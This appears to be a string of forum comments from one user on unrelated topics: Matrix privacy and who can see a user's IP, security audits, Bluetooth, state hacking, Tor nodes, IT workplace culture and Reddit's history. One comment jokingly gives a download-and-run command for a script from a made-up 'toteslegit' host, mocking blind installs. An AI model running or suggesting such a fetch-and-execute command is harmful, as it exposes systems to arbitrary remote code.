Just something to keep in mind for those not in the security space. When a security company does an audit, its generally a checklist of commercial and custom security software along with a couple people poking around looking for more manual harder to find stuff. But there’s a reason companies like Mullvad have a bug bounty program… Just because cure53 didn’t find it, it doesn’t mean some bored hacker won’t…

Absolutely better than nothing though.

This should have been much more well thought out The wording, image, buttons, specific wording for each page.

They really screwed the pooch.

Another 4-6 months minimum before release. But quarterly numbers must be met.

Then maybe you’re okay.

A number of people can see your IP, people will chime in and add to ane remove from this list:

Can’t see it:

• Random people you personal message with
• Random people you chat with in rooms

CAN see it:

• Server admins
• People you share (send/rcv files with) // this may have been fixed
• People who send you links and you click them, but this isn’t specific to Matrix, it’s a tale as old as time.
• You voice call with someone (may have been fixed)

Some info may be wrong. But having someone’s IP in the days of routers and all filtered ports means little, unless you piss off someone who knows some low level customer support person @ your ISP to pay to get your account info. Or you’re dealing drugs in which case use TAILS and stop fucking with technologies you don’t know the specifics of.

If they knock you offline and you can’t access anything at all, unplug your router AND MODEM (most importantly your modem) for an hour. Go touch grass for an hour. Widdle a wee branch. Plus your boxes back in and you’ll be bright as new.

@possiblylinux127@lemmy.zip this isn’t meant to be a dig at you, although last time you didn’t care to correct or learn if I recall,but often times you leave out the “if so,” “possibly, what and XYZ?'” and it ends up spreading misinformation because you didn’t know enough or care enough to type enough.

I love Matrix but we need to be open about what the fish is before skinning it…

https://gist.github.com/maxidorius/5736fd09c9194b7a6dc03b6b8d7220d0

https://blog.erethon.com/blog/2022/07/13/what-a-malicious-matrix-homeserver-admin-can-do/

https://www.reddit.com/r/PrivacyGuides/comments/q7qsty/is_matrix_still_a_metadata_disaster/

wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh

was I not supposed to do that? but staxoverflown said it’s OK.

That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.

I’m just surprised and curious and never got a satisfying answer.

Honeypot? Dunno. Good discussions about it on hacker news.

And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

https://www.thc.org/segfault/

Just don’t run an exit node? We need more guard and relay nodes anyway. I fail to see the issue.

Chances are this is a kid or NEET and all his friend wants is a super simple website with basic info for his local business. Dad is either doing him a favor, or giving him some pocket change so he’ll stop bothering him for money for a month. This is what happens when you don’t teach your children to be adults, and give them everything instead. Seen it too many times.

Based on this interaction alone and his dad deciding the price for him, I’m going to make the wildly assumptious assumption this is a 20s/30s(/40s?) unemploymed guy living at his dad’s house rent free.

If my assumptions are incorrect, sorry mate, you did not win the dad lottery.

Some of them, sure. Usually old people that ran out of neuroplasticity 40 years ago. But there are a lot more that function well enough and IT guys (specifically the guys, IT gals usually either have a better idea or hide it better) have a tendency to think of them as useless, where if they had to do their job for a day they’d be as lost as an old guy spooked by the window location change.

Yeah but he’s just a temporarily inconvenienced billionaire, the rest of these welfare queens are out here collecting rent and sitting around all day. They don’t need the money like he does. As soon as he gets a job, he’ll hustle that first billion in no time.

His YouTube shorts (500/day goal) is videos of Elon musk saying things, with the background music alternating between the sigma male tune and the movie clip tune.

Did you see how ELON MUSK OWNED💯 DON LEMON by getting flustered at the question of “half your advertisers have left the platform, if X fails, isn’t that on you?” so he told Don he should choose his words carefully because the interview clock only had 5 minutes left? And then Don was OWNED because he rephrased the question?

LMAO. SUCK IT CNN. OWNED!

So many people in IT don’t understand this. I’m glad I did a lot of customer service while programming was still just a hobby.

Developing the product or supporting the product dev team in some way (tech support, project managers, etc) is great, but if the company doesn’t have people to schmooze other people to give them money, your product doesn’t have much financial value.

You work on computers, they work on people. Part of their job is coding on their bosses for more money, while you write a script to automate something. Hard skills vs. soft skills.

If you want, you could develop those people manipulation coding skills and be twice as valuable as them.

So programming is gonna go from a “search, understand basics, copy/paste, make changes” industry to a “I breathe compiler optimization, pay me money” industry?

Can’t say I’m that upset, it had to happen eventually. But this will only kick the brainpower down the road for the copy/pasters because they’ll have a lot more time to dig in and specialize.

Lemmy is reddit 3.0. Early on, Reddit was basically only a website for tech nerds and misfits; atheism and jailbait were some of the most visited subreddits, idpol and divpol weren’t a make-or-break-your-family issue back then but there were still a ton of terminally online furries (yes if you’re a furry you’re weird, but weird is fine, let that freak flag fly.) I’m including myself in the group of outcasts and misfits, and my freak flag flies in weird ways too. I’ve been on Reddit since the default UI was , although it hadn’t changed much over the years before the redesign. Notice the quality of submissions though - it was a place for the intellectually curious.

But you have a large subset of users who use pedantry and grammar nazi`ism as a way to feel powerful when they’re powerless. It’s like picking on those lower than you, when you’re in the bottom of the pecking order.

Those people saw reddit go from their bastion of freedom to the corporate ad-haven it is today and all came here. You also have a lot of younger people with the time to kill and are just trying something new.

That was supposed to be or, not of.